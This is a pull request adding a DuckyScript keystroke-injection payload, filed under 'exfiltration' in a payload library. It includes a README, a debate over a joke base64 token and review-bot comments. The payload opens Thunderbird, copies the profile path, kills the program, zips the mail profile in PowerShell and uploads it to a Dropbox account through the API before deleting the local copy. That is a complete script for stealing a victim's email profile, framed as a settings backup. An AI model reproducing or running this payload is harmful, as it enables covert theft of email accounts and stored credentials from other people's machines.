Save Your Thunderbird Settings via Dropbox #454

Open
wants to merge 4 commits into
base: master
Changes from 2 commits
103 changes: 103 additions & 0 deletions payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md
@@ -0,0 +1,103 @@
# Save Your Thunderbird Settings via Dropbox

Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature.

This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration.

**Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff!
Member

Please remove any personal tokens.

Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...

Contributor Author

@aleff-github aleff-github Jun 27, 2024

it's just a prank :-/


**Category:** Exfiltration

## Index

- [Overview](#overview)
- [Requirements](#requirements)
- [Test Environment](#test-environment)
- [Configuration](#configuration)
- [Functionality](#functionality)
- [System Detection](#system-detection)
- [Opening Thunderbird](#opening-thunderbird)
- [Copying Profile Folder Path](#copying-profile-folder-path)
- [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox)
- [Notes](#notes)
- [Credits](#credits)

## Overview

This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox.

## Requirements

- **Dropbox Access Token:** You need a valid Dropbox access token to upload the file.
- **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem.
- **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet...

## Test Environment

- Thunderbird 115.11.1 (64 bit)
- Windows 10 Pro

## Configuration

Before running the program, ensure to set the following parameters (*except #DROPBOX_API_CONST that is a constant*) correctly/as you prefer:

```plaintext
DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==
Member

Please update this to use a placeholder to prevent confusion. Similar to how it's defined inside your payload.

DEFINE #ACCESS_TOKEN example-access-token

Contributor Author

it's just a prank :-/

Contributor Author

Convert from aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== via base64 and the result is https://www.youtube.com/watch?v=RvY5ploo1OI.

This video reindexes toward an Italian meme that says "Eh volevi..." so "eh you wanted..." referring to the fact that a person was trying to use a valid token while actually being pranked.

It's so bad to have to explain a joke :(

Member

I understand, but others might not, and that's my concern. Other people might read your readme, see the base64 and assume it's your token and use it. They might not understand that it's a joke. It's unlikely that someone will do this, but we can prevent the possibility.

Contributor Author

I think we should be a little more flexible 🤷‍♂️

DEFINE #ARCHIVE_NAME cache.zip
DEFINE #DROPBOX_FOLDER_PATH /
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
```
- `#ACCESS_TOKEN`: Your private Dropbox access token
- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`).
- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`).

## Functionality

### System Detection

The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied.

### Opening Thunderbird

The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use.

### Copying Profile Folder Path

The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file.

### Opening PowerShell and Uploading to Dropbox

Using PowerShell, the script performs the following actions:

1. **Navigate to TEMP Directory:** Changes the directory to the temporary environment path.
2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used.
3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file.
4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API.
5. **Cleanup:** Removes the local ZIP file after the upload is complete.

## Notes

- This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal.
- Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data.

## Credits

<h2 align="center"><a href="https://aleff-gitlab.gitlab.io/">Aleff</a></h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
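Review bot: The Configuration block still ships a base64 value for `#ACCESS_TOKEN` that decodes to a YouTube link rather than a placeholder, and the "Alert!" paragraph above says the author's personal Dropbox token was uploaded; both contradict the Notes section and the maintainer's request. Replace it with a labelled placeholder such as `DEFINE #ACCESS_TOKEN example-access-token` (the form already suggested in review) and drop the "Alert!" paragraph, so no reader mistakes the value for a live credential. Smaller points: the sentence directly under the title is a fragment, "istance" should read "instance", and the parameter list documents `#ACCESS_TOKEN`, `#ARCHIVE_NAME` and `#DROPBOX_FOLDER_PATH` but not `#DROPBOX_API_CONST`, even though the sentence before it singles that define out as a constant; a one-line entry stating that it is the Dropbox upload endpoint and is not meant to be changed would close that gap.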
@@ -0,0 +1,105 @@
REM ##############################################################
REM # #
REM # Title : Save Your Thunderbird Settings via Dropbox #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Exfiltration #
REM # Target : Windows 10/11 #
REM # #
REM ##############################################################

REM Required: Set here your Dropbox access TOKEN
DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==
DEFINE #ARCHIVE_NAME cache.zip
DEFINE #DROPBOX_FOLDER_PATH /
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload

EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120

VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION

GUI r
STRING thunderbird
ENTER
DELAY 1000
REPEAT 4 TAB
DELAY 500
ENTER
DELAY 500
REPEAT 2 UPARROW
DELAY 500
ENTER
DELAY 500
REPEAT 3 UPARROW
DELAY 500
ENTER
DELAY 500

REM Inside the settings
REPEAT 11 TAB
DELAY 500
ENTER
DELAY 500

REM INSIDE THE PROFILE FOLDER
REPEAT 4 TAB
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 500
ALT F4
DELAY 500
GUI r
STRING powershell
ENTER
DELAY 1500

STRINGLN cd $env:TEMP
DELAY 500
STRINGLN Stop-Process -Name "thunderbird" -Force
DELAY 500
STRING Compress-Archive -LiteralPath
DELAY 500
CTRL v
DELAY 500
STRINGLN -DestinationPath ./#ARCHIVE_NAME
DELAY 1000

STRINGLN
$filePath = "$env:TEMP/#ARCHIVE_NAME"
$filePath = $filePath -replace "\\", "/"
$dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME"
$accessToken = "#ACCESS_TOKEN"
$fileContent = [System.IO.File]::ReadAllBytes($filePath)
$headers = @{
"Authorization" = "Bearer $accessToken"
"Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}")
"Content-Type" = "application/octet-stream"
}
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit
END_STRINGLN
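Review bot: `#DROPBOX_API_CONST` is defined at the top but never used: the `Invoke-RestMethod` line inside the STRINGLN block hardcodes `https://content.dropboxapi.com/2/files/upload`, so the DEFINE is dead and the README's description of it as the configurable constant is misleading; either pass `#DROPBOX_API_CONST` as the `-Uri` argument or remove the DEFINE. The `#ACCESS_TOKEN` value has the same problem flagged on the README and should be the placeholder the reviewer asked for, matching the `REM Required: Set here your Dropbox access TOKEN` comment right above it. Two style points: the `-replace "\\", "/"` on `$filePath` serves no purpose, since `[System.IO.File]::ReadAllBytes` accepts a Windows path with backslashes as-is; and the REPEAT TAB/UPARROW counts used to reach the profile folder are tied to the Thunderbird 115 settings layout named in the README's Test Environment, so a REM line at the navigation block stating that dependency would save the next reader from guessing why the sequence breaks on other versions.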